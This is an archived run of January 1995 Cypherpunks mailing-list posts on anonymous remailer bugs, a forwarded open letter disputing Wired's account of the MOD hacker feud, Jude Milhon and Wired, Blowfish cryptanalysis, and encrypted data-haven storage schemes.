=syn9 -----END PGP PUBLIC KEY BLOCK----- From merriman at metronet.com Sun Jan 15 18:44:58 1995 From: merriman at metronet.com (David K. Merriman) Date: Sun, 15 Jan 95 18:44:58 PST Subject: hiatus Message-ID: <199501160245.AA09108@metronet.com> Just a short note to let folks know that I'll be unsubscribing for a while (probably a couple of months) while I get ready and then move to Amarillo to set up an ISP :-) The staging phase is taking up a large portion of my time, and I really don't have the slack to do more than give the subject lines in the CP list a cursory glance these days - just enough to see what the current flame war is about :-) Once I get the ISP set up, I'll be putting an anon remailer on it; I may also offer "Remailer-in-a-box" accounts for some relatively minor fee (if motivated, I may even take digicash as payment :-). I don't expect any problems about setting up accounts, since I'll be the MIS Manager, VP Engineering, etc, etc. Too, since the service will be commercial, I expect that I'll be able to do a pretty fair job of ignoring complaints of the kind that get .edu and on-the-left remailers shut down. I'll still be able to receive email at this account at least until the end of February; once I get set up in Amarillo, I'll resub and let everyone know where I am (just in case anyone cares :-) FYI, the tentative name for the ISP is panhandle.net..... Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From paul at hawksbill.sprintmrn.com Sun Jan 15 18:58:12 1995 From: paul at hawksbill.sprintmrn.com (Paul Ferguson) Date: Sun, 15 Jan 95 18:58:12 PST Subject: ... and speaking of WiReD... Message-ID: <9501160258.AA09372@hawksbill.sprintmrn.com> Given the recent discussion on WireD, I thought some of you might enjoy this editorial (read: rant) authored by Erik Bloodaxe. Enjoy. - paul Forwarded message: > Date: Sun, 15 Jan 1995 20:34:00 CST > Reply-To: TK0JUT2 at MVS.CSO.NIU.EDU > Sender: CU-DIGEST list > From: "Cu Digest (tk0jut2 at mvs.cso.niu.edu)" > Subject: Cu Digest, #7.03 > To: Multiple recipients of list CUDIGEST > > Computer underground Digest Sun Jan 15, 1995 Volume 7 : Issue 03 > ISSN 1004-042X > > Editors: Jim Thomas and Gordon Meyer (TK0JUT2 at NIU.BITNET) > Archivist: Brendan Kehoe > Retiring Shadow Archivist: Stanton McCandlish > Shadow-Archivists: Dan Carosone / Paul Southworth > Ralph Sims / Jyrki Kuoppala > Ian Dickinson > Copy Reader: Laslo Toth > > CONTENTS, #7.03 (Sun, Jan 15, 1995) > > File 1--Open Letter to Wired Magazine (fwd) > File 2--More Legal Analysis of Steve Jackson Games (Legal Bytes) > File 3--The Stupid Net.Coverage News Awards -- 1994 and 1995 > File 4--Alliance for Community Media -- Call for Workshops > File 5--Cu Digest Header Info (unchanged since 25 Nov 1994) > > CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN > THE CONCLUDING FILE AT THE END OF EACH ISSUE. > > ---------------------------------------------------------------------- > > Date: Sat, 14 Jan 1995 20:08:38 -0600 (CST) > From: David Smith > Subject: File 1--Open Letter to Wired Magazine (fwd) > > ---------- Forwarded message ---------- > > >From--phrack at well.sf.ca.us (Chris Goggans) > >Subject--Open Letter to Wired Magazine > >Date--13 Jan 1995 00:51:09 GMT > > To Whom It May Concern: > > I am writing this under the assumption that the editorial staff at > Wired will "forget" to print it in the upcoming issue, so I am also > posting it on every relevant newsgroup and online discussion forum > that I can think of. > > When I first read your piece "Gang War In Cyberspace" I nearly choked > on my own stomach bile. The whole tone of this piece was so far > removed from reality that I found myself questioning what color the > sky must be in Wired's universe. Not that I've come to expect any > better from Wired. Your magazine, which could have had the potential > to actually do something, has become a parody...a politically correct > art-school project that consistently falls short of telling the whole > story or making a solid point. (Just another example of Kapor-Kash > that ends up letting everyone down.) > > I did however expect more from Josh Quittner. > > I find it interesting that so much emphasis can be placed on an issue > of supposed racial slurs as the focus of an imaginary "gang war," > especially so many years after the fact. > > It's also interesting to me that people keep overlooking the fact that > one of the first few members of our own little Legion of Doom was > black (Paul Muad'dib.) Maybe if he had not died a few years back that > wouldn't be so quickly forgotten. (Not that it makes a BIT of > difference what color a hacker is as long as he or she has a brain and > a modem, or these days at least a modem.) > > I also find it interesting that a magazine can so easily implicate > someone as the originator of the so-called "fighting words" that > allegedly sparked this online-battle, without even giving a second > thought as to the damage that this may do to the person so named. One > would think that a magazine would have more journalistic integrity > than that (but then again, this IS Wired, and political correctness > sells magazines and satisfies advertisers.) Thankfully, I'll only have > to endure one moth of the "Gee Chris, did you know you were a racist > redneck?" phone calls. > > It's further odd that someone characterized as so sensitive to insults > allegedly uttered on a party-line could have kept the company he did. > Strangely enough, Quittner left out all mention of the MOD member who > called himself "SuperNigger." Surely, John Lee must have taken > umbrage to an upper-middle class man of Hebrew descent so shamefully > mocking him and his entire race, wouldn't he? Certainly he wouldn't > associate in any way with someone like that...especially be in the > same group with, hang out with, and work on hacking projects with, > would he? > > Please, of course he would, and he did. (And perhaps he still > does...) > > The whole "racial issue" was a NON-ISSUE. However, such things make > exciting copy and garner many column inches so keep being rehashed. > In fact, several years back when the issue first came up, the > statement was cited as being either "Hang up, you nigger," or "Hey, > SuperNigger," but no one was sure which was actually said. Funny how > the wording changes to fit the slant of the "journalist" over time, > isn't it? > > I wish I could say for certain which was actually spoken, but alas, I > was not privy to such things. Despite the hobby I supposedly so > enjoyed according to Quittner, "doing conference bridges," I abhorred > the things. We used to refer to them as "Multi-Loser Youps" > (multi-user loops) and called their denizens "Bridge Bunnies." The > bridge referred to in the story was popularzed by the callers of the > 5A BBS in Houston, Texas. (A bulletin board, that I never even got > the chance to call, as I had recently been raided by the Secret > Service and had no computer.) Many people from Texas did call the > BBS, however, and subsequently used the bridge, but so did people from > Florida, Arizona, Michigan, New York and Louisiana. And as numbers do > in the underground, word of a new place to hang out caused it to > propagate rapidly. > > To make any implications that such things were strictly a New York > versus Texas issue is ludicrous, and again simply goes to show that a > "journalist" was looking for more points to add to his (or her) > particular angle. > > This is not to say that I did not have problems with any of the people > who were in MOD. At the time I still harbored strong feelings towards > Phiber Optik for the NYNEX-Infopath swindle, but that was about it. > And that was YEARS ago. (Even I don't harbor a grudge that long.) > Even the dozen or so annoying phone calls I receied in late 1990 and > early 1991 did little to evoke "a declaration of war." Like many > people, I know how to forward my calls, or unplug the phone. Amazing > how technology works, isn't it? > > Those prank calls also had about as much to do with the formation of > Comsec as bubble-gum had to do with the discovery of nuclear fission. > (I'm sure if you really put some brain power to it, and consulted > Robert Anton Wilson, you could find some relationships.) At the risk > of sounding glib, we could have cared less about hackers at Comsec. > If there were no hackers, or computer criminals, there would be no > need for computer security consultants. Besides, hackers account for > so little in the real picture of computer crime, that their existence > is more annoyance than something to actually fear. > > However, when those same hackers crossed the line and began tapping > our phone lines, we were more than glad to go after them. This is one > of my only rules of action: do whatever you want to anyone else, but > mess with me and my livelihood and I will devote every ounce of my > being to paying you back. That is exactly what we did. > > This is not to say that we were the only people from the computer > underground who went to various law enforcement agencies with > information about MOD and their antics. In fact, the number of > hackers who did was staggering, especially when you consider the usual > anarchy of the underground. None of these other people ever get > mentioned and those of us at Comsec always take the lead role as the > "narks," but we were far from alone. MOD managed to alienate the vast > majority of the computer underground, and people reacted. > > All in all, both in this piece, and in the book itself, "MOD, The Gang > That Ruled Cyberspace," Quittner has managed to paint a far too > apologetic piece about a group of people who cared so very little > about the networks they played in and the people who live there. In > the last 15 years that I've been skulking around online, people in the > community have always tended to treat each other and the computers > systems they voyeured with a great deal of care and respect. MOD was > one of the first true examples of a groupthink exercise in hacker > sociopathy. Selling long distance codes, selling credit card numbers, > destroying systems and harassing innocent people is not acceptable > behavior among ANY group, even the computer underground. > > There have always been ego flares and group rivalries in the > underground, and there always will be. The Legion of Doom itself was > FOUNDED because of a spat between its founder (Lex Luthor) and members > of a group called The Knights of Shadow. These rivalries keep things > interesting, and keep the community moving forward, always seeking the > newest bit of information in a series of healthy one-upsmanship. MOD > was different. They took things too far against everyone, not just > against two people in Texas. > > I certainly don't condemn everyone in the group. I don't even know a > number of them (electronically or otherwise.) I honestly believe that > Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed > while the group's two biggest criminals, Julio Fernandez (Outlaw) and > Allen Wilson (Wing), rolled over on everyone else and walked away free > and clear. This is repulsive when you find out that Win in particular > has gone on to be implicated in more damage to the Internet (as Posse > and ILF) than anyone in the history of the computing. This I find > truly disgusting, and hope that the Secret Service are proud of > themselves. > > Imagine if I wrote a piece about the terrible treatment of a poor > prisoner in Wisconsin who was bludgeoned to death by other inmates > while guards looked away. Imagine if I tried to explain the fact that > poor Jeff Dahmer was provoked to murder and cannibalism by the mocking > of adolescent boys who teased and called him a faggot. How would you > feel if I tried to convince you that we should look upon him with pity > and think of him as a misunderstood political prisoner? You would > probably feel about how I do about Quittner's story. > > 'Hacker' can just as easily be applied to "journalists" too, and with > this piece Quittner has joined the Hack Journalist Hall of Fame, > taking his place right next to Richard Sandza. > > Quittner did get a few things right. I do have a big cat named Spud, > I do work at a computer company and I do sell fantastic t-shirts. Buy > some. > > With Love, > > Chris Goggans > aka Erik Bloodaxe > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > http://fringeware.com/staff/jonl > -- _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul at hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From pstemari at erinet.com Sun Jan 15 19:30:40 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sun, 15 Jan 95 19:30:40 PST Subject: FAREWELL TO A.R.S. (fwd) Message-ID: Now the cypherpunks are going to get blamed for anything that happens to the "Church" of Scientology. Sigh: In article <3f86hh$6gj at ag.oro.net> smj at smudge.oro.net (Scott Jennings) writes: > ... >Homer Wilson Smith (homer at math.cornell.edu) wrote: >: ... is a joke. Their rmgroup message did exactly nothing except create >: 10 more newgroup message and a total war zone on alt.config. They are >: not only pissing off the cypherpunks, but also pissing off the people >: of alt.config. If they continue, this war may spread from the internet >: into the real world as cypherpunks start to hack Church accounts and >: communication lines everywhere, causing total disruption of Scientology. >: >: If all the cypherpunks and hackers and crackers and phone freaks >: and virus writers of the world unite and start to 'rmgroup Scientology', who >: do you think will win? ... Paul J. Ste. Marie, pstemari at well.sf.ca.us, pstemari at erinet.com From tcmay at netcom.com Sun Jan 15 20:30:18 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 15 Jan 95 20:30:18 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501160118.AA05350@snark.imsi.com> Message-ID: <199501160356.TAA09359@netcom2.netcom.com> Perry E. Metzger wrote: > rishab at dxm.ernet.in says: > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > member of the cypherpunks - a term that she coined." I didn't even know there > > _was_ a charter. > > Or a Jude Milhon, for that matter. Another example of the continuing > decay of a once proud magazine... I'm not sure what Perry's not having heard of Jude Milhon is supposed to mean, or how "Wired" interviewing her is "another example of the continuing decay," etc. In any case, Jude Milhon has been active in the hacker-writer community, going back to the 1970s. Steven Levy's "Hackers" has several pages on her role in various things happening in the Lee Felsenstein circle of folks (there may be some of you who have no idea who Lee is....I can only hope that when you find interviews with him you not assume decay is occurring). More recently she was an editor at "Mondo 2000" and has had various connections to Cypherpunks. Jude was indeed the coiner of the "cypherpunk" term, and was at most of the early meetings, for at least the first year. (My FAQ will have more information on how Jude came to think of the name and whatnot.) She's not presently subscribed and hence can't speak up in this strange matter of how an interview with her implies a magazine is in decay. (I'm hoping this is not what Perry really meant, but I can't see any other interpretations based on what I quoted above.) I just don't think Jude deserves this kind of casual trashing. While I haven't been reading "Mondo" regularly for a couple of years, and while I'm getting bored with "Wired," this doesn't mean that people being interviewed deserve trashing. (Indeed, the "bleeding edge" trendiness of "Wired," say, means that nearly anything once "wired" is fated to be marked as "tired" by the "stimulate me!" Starbucks crowd of techno-yuppies. Unlike a more staid journal, like "Nature" or "The Economist," as examples, trendy techno-style mags like "Wired," "Spin," "boing boing," "Future Sex," and a hundred other wirehead variants of "Vogue" and "People" will appeal precisely to the style mavens who so fickly announce what is trendy and what is not. Anyone who professes to be "disappointed" by "Wired" was clearly taken in by their hype. (For what it's worth, I still enjoy flipping through the pages, often finding one or two items that spark my thinking. No, much of it is junk. So what else is new?) Oh, and on Rishab's original point about "charter members," I took this in the usual figurative sense. A charter member of the Cypherpunks is basically just a card-carrying member. (Hint: Find your own cards.) --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From erc at s116.slcslip.indirect.com Sun Jan 15 20:45:28 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Sun, 15 Jan 95 20:45:28 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com> Message-ID: > Jude was indeed the coiner of the "cypherpunk" term, and was at most of > the early meetings, for at least the first year. (My FAQ will have > more information on how Jude came to think of the name and whatnot.) I, for one, would like to see this - I've only been on the list for a bit over two years, and I'd never heard of Jude, either. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "How many beers have you had tonight, bro?" "Seventy." -- "Cops" From jml at wizard.synapse.net Sun Jan 15 20:50:35 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 20:50:35 PST Subject: bug in remailers Message-ID: <199501160449.XAA15798@sentinel.synapse.net> > If the remailers are working correctly, then one way you can be >getting garbled postings is if your files are being garbled while you are >pgping them. Have you tried to pgp your files TO YOURSELF, and then unpgp >them to see if they come out ok? Yes I have tried that. No problem they come out ok. > Does the bug happen on the remailers when things are not pgp'd? Well no problem with anon at penet.fi. I'll try other remailers that permit unpgp'ed messages and get back to you. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR tAZ3aXphcmQ= =syn9 -----END PGP PUBLIC KEY BLOCK----- From homer at math.cornell.edu Sun Jan 15 20:54:25 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 20:54:25 PST Subject: bug in remailers In-Reply-To: <199501160449.XAA15798@sentinel.synapse.net> Message-ID: I am getting the same errors, even without pgp! homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > If the remailers are working correctly, then one way you can be > >getting garbled postings is if your files are being garbled while you are > >pgping them. Have you tried to pgp your files TO YOURSELF, and then unpgp > >them to see if they come out ok? > > Yes I have tried that. No problem they come out ok. > > > Does the bug happen on the remailers when things are not pgp'd? > > Well no problem with anon at penet.fi. I'll try other remailers that permit > unpgp'ed messages and get back to you. > > > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj > hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E > FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR > tAZ3aXphcmQ= > =syn9 > -----END PGP PUBLIC KEY BLOCK----- > > From jml at wizard.synapse.net Sun Jan 15 21:00:04 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 21:00:04 PST Subject: bug in remailers Message-ID: <199501160459.XAA15941@sentinel.synapse.net> > I am getting the same errors, even without pgp! > > homer Well to tell the truth I'm glad that I'm not the only one it's happening to. This seems a fairly serious problem. (To anonymous remailers sysadmin) Is this something new? Must be I guess. (Paranoid mode on). Sabotage? -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR tAZ3aXphcmQ= =syn9 -----END PGP PUBLIC KEY BLOCK----- From homer at math.cornell.edu Sun Jan 15 21:03:12 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:03:12 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: Am looking to find out why... On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage? > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj > hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E > FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR > tAZ3aXphcmQ= > =syn9 > -----END PGP PUBLIC KEY BLOCK----- > > From entropy at IntNet.net Sun Jan 15 21:04:09 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 21:04:09 PST Subject: Crypto functions In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com> Message-ID: > Well, I wasn't the original person who said that they wouldn't use it, > but I would agree. It's too new. It looks very good so far, but until it's > been through a lot more analysis than Blowfish has received so far, it is > too much of an unknown quantity. Ah. Incidentally, I wasn't just being a wiseass when I asked why, I wanted to know. Has no one significantly cryptanalysed Blowfish yet? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jml at wizard.synapse.net Sun Jan 15 21:12:49 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 21:12:49 PST Subject: Interesting problem with remailers Message-ID: <199501160512.AAA16114@sentinel.synapse.net> >To: lce at wwa.com (Larry E) >From: jml at wizard.synapse.net >Subject: Re: Interesting problem with remailers >>Try pgp -eat instead of pgp -ea. Please let me know if that solves >>your problem; I'm curious. No doesn't make any difference. Seems I'm not the only one to have this problem. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR tAZ3aXphcmQ= =syn9 -----END PGP PUBLIC KEY BLOCK----- From mg5n+ at andrew.cmu.edu Sun Jan 15 21:19:41 1995 From: mg5n+ at andrew.cmu.edu (Matthew J Ghio) Date: Sun, 15 Jan 95 21:19:41 PST Subject: interesting problem with remailers (answer to FAQ) In-Reply-To: Message-ID: > I have encrypted this message with the public key of homer at rahul.net > using the pgp -ea command (for armour). Use -t From homer at math.cornell.edu Sun Jan 15 21:24:33 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:24:33 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: Bug dead. It was unique to my remailer and was not a problem to other remailers. Christ, you just shouldn't let me near a keyboard. Rahul is out of reach for the moment, but I will fix it at first chance. Homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage? > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj > hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E > FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR > tAZ3aXphcmQ= > =syn9 > -----END PGP PUBLIC KEY BLOCK----- > > From homer at math.cornell.edu Sun Jan 15 21:39:50 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Sun, 15 Jan 95 21:39:50 PST Subject: bug in remailers In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net> Message-ID: OK, its fixed. Sorry. Homer On Sun, 15 Jan 1995 jml at wizard.synapse.net wrote: > > I am getting the same errors, even without pgp! > > > > homer > > Well to tell the truth I'm glad that I'm not the only one it's happening to. > This seems a fairly serious problem. (To anonymous remailers sysadmin) Is > this something new? Must be I guess. (Paranoid mode on). Sabotage? > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj > hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E > FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR > tAZ3aXphcmQ= > =syn9 > -----END PGP PUBLIC KEY BLOCK----- > > From tcmay at netcom.com Sun Jan 15 21:57:17 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 15 Jan 95 21:57:17 PST Subject: Jude Milhon in WIRED In-Reply-To: Message-ID: <199501160556.VAA05701@netcom19.netcom.com> Ed Carp [khijol Sysadmin] wrote: > > > Jude was indeed the coiner of the "cypherpunk" term, and was at most of > > the early meetings, for at least the first year. (My FAQ will have > > more information on how Jude came to think of the name and whatnot.) > > I, for one, would like to see this - I've only been on the list for a bit > over two years, and I'd never heard of Jude, either. It's in the Cyphernomicon FAQ...just grep for it. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From shamrock at netcom.com Sun Jan 15 22:36:00 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 15 Jan 95 22:36:00 PST Subject: CP meeting lost&found Message-ID: Did anyone notice a left over coat at the CP meeting? My friend seems to be unable to locate his. It's a purple Timberland with white leather trims. The coat has very important mail in the inside pocket. Thanks, -- Lucky Green PGP encrypted mail preferred. From rrothenb at libws4.ic.sunysb.edu Sun Jan 15 22:42:17 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sun, 15 Jan 95 22:42:17 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <9501160642.AA07182@toad.com> A couple of days ago I wrote: > >[. . .] > >How does one keep a site from becomming a remote pirated-software exchange > >site? [. . . .] > > Simple. The file is deleted upon retrevial. > Assuming that data haven does. I imagine some wouldn't, to allow for long- term storage or retrieval by multiple parties (which, for data havens to be viable as a commodity would probably be supported in some way as a feature) > -- > Ben.Goren at asu.edu, Arizona State University School of Music > Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. Rob Rob Rothenburg Walking-Owl, SUNY @ Stony Brook From rrothenb at libws4.ic.sunysb.edu Sun Jan 15 22:50:06 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sun, 15 Jan 95 22:50:06 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <9501160649.AA07279@toad.com> A couple of days ago I wrote: > > such a service could become a magnet for the "elite warez" crowd... > > > What's wrong with young, curious eLiTiStS running storing sites for > mutual benefits ('warez')? Some say copyright is dead. Others have > taken this to their hearts, especially for private use, and I don't > blame them. Copyrighted data on a server in a jurisdiction that > doesn't acknowledege the copyrights - a prime use for Data Havens > when they come of age. I'm not saying anything is wrong with it.... just that it is a problem that can lead the "authorities" to try to shut down the site, esp. when the pornography bogieman wears out (pun intended ;). Strangely, even though it's more socially acceptable for people to use "borrowed" wares there's poorer arguments for defending it than "pornography"... hardly any cries of foul happen when a board or site is busted for pirated software than pornography. Basically, what I'm saying is that it's an issue that data haven admins should keep in mind (esp. if there's a fee): perhaps they can most safely be run in jurisdictions with lax or no copyright laws. > > Mats > Rob From grendel at netaxs.com Sun Jan 15 23:04:34 1995 From: grendel at netaxs.com (Michael Handler) Date: Sun, 15 Jan 95 23:04:34 PST Subject: Cryptanalysis of Blowfish (Was: Re: Crypto functions) In-Reply-To: Message-ID: On Sun, 15 Jan 1995, Jonathan Cooper wrote: > Has no one significantly cryptanalysed Blowfish yet? Bruce Schneier is running a contest. First person to come up with a significant attack against full Blowfish (no partial round variants) gets $1000. The contest ends in April. Last time I heard, he had gotten a very interesting attack from someone, but not a complete one. He plans to reveal the results after the contest ends in April. -mbh- -- Michael Handler Civil Liberty Through Complex Mathematics Philadelphia, PA PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF "Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme From wcs at anchor.ho.att.com Sun Jan 15 23:38:23 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 15 Jan 95 23:38:23 PST Subject: Jude Milhon in WIRED Message-ID: <9501160735.AA22438@anchor.ho.att.com> Oh, come on, Perry - your memory must be decaying. I've met Jude 3-4 times in the last 1.5 years, including at Bay Area cypherpunks meetings (the long boring photo-shoot for the NY Times Magazine, for instance), and it's been referred to in the past that "cypherpunks" was her pun. She's also the one who put out requests for character contributions to a novel she's doing, which went to the list. Besides, if you're grumpy that you haven't met someone, you need to get out here to the left coast more often - New York winters must be getting to you :-) Bill From jcorgan at scruznet.com Mon Jan 16 00:32:14 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Mon, 16 Jan 95 00:32:14 PST Subject: CP meeting lost&found Message-ID: >Did anyone notice a left over coat at the CP meeting? My friend seems to be >unable to locate his. It's a purple Timberland with white leather trims. >The coat has very important mail in the inside pocket. Yes. As we were leaving, Katy was asking around for the owner of the jacket. I assume she probably still has it or it is at SGI for safekeeping. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov From wcs at anchor.ho.att.com Mon Jan 16 00:59:40 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 16 Jan 95 00:59:40 PST Subject: How do I know if its encrypted? Message-ID: <9501160856.AA23138@anchor.ho.att.com> Ben writes: > Paul, I think we're after two different objectives here. > You want Alice to be sure that Dave can't read her file; > I want Dave to be sure that he can't read Alice's files. Yeah. Picking threat models is important. Alice's job is easy; she can just encrypt stuff. The problems are a bit different if the file can only be retrieved by Alice, or if she can give retrieval tokens to Bob, Carol, and alt.sex.spam. If Dave is running a free or cheap service, he also may need to prevent his site from becoming load-spammed by the permanent floating warez+porno crowd. (As Eric pointed out, it's a policy-vs-mechanism issue; it's easier to run a service if you've got mechanisms to support any policy you want.) If Dave's charging for service, charging separately for storage and retrieval can help - that lets the one-storage, many-retrieval model work without having to use mechanisms like automatic deletion-after-reading, which may not be useful for some applications. For Dave to be sure he can't read Alice's files, he can't depend on Alice encrypting them - aside from entropy models which are generally not very useful, Alice could always encrypt the data and then publish the key. So he has to do it. Here're 1.5 approaches that can work for some threats: Alice wants to store message M, using a key K known to Alice. (K could be hash H(M) if desired, or sent to Dave along with M.) Dave calculates H(K), encrypts M with K, stores E(M;K) under name H(K), and then discards K. To retrieve files, Alice sends either K or H(K). There's some risk at storage - Dave is receiving the file, so he's vulnerable to cops between the time he PGP-decrypts the message and the time he re-encrypts and destroys the key, but it's brief, and can be automated so he doesn't see it in person; he could still be coerced into eavesdropping future storage unless there's a good blinded variant on the method. Alice needs to keep or K or give it to her friends. If retrievals use K, Dave can decrypt on transmission (some risk, some potential revenue). This has the advantage that Dave doesn't know the access token to retrieve a given file across the net, so he can't tell the cops what to scan for. If retrievals only use H(K), he can't decrypt on retrieval, so even if the cops coerce Alice or bribe Bob into retrieving it, Dave doesn't see the content again; it's probably a lot safer for Dave. The risk is that cops who break Dave's system or coerce him into giving them the files will know to look for H(K) on other systems; scanning the net for anything that might hash to H(K) is much harder. Also, Alice might want to give Bob and Carol H(K) to retrieve the files, but not give them K to decrypt until later, or might send K through other channels that only the In Crowd get. Another extension is for Dave to store the file as H(H(K)), to make it more work to 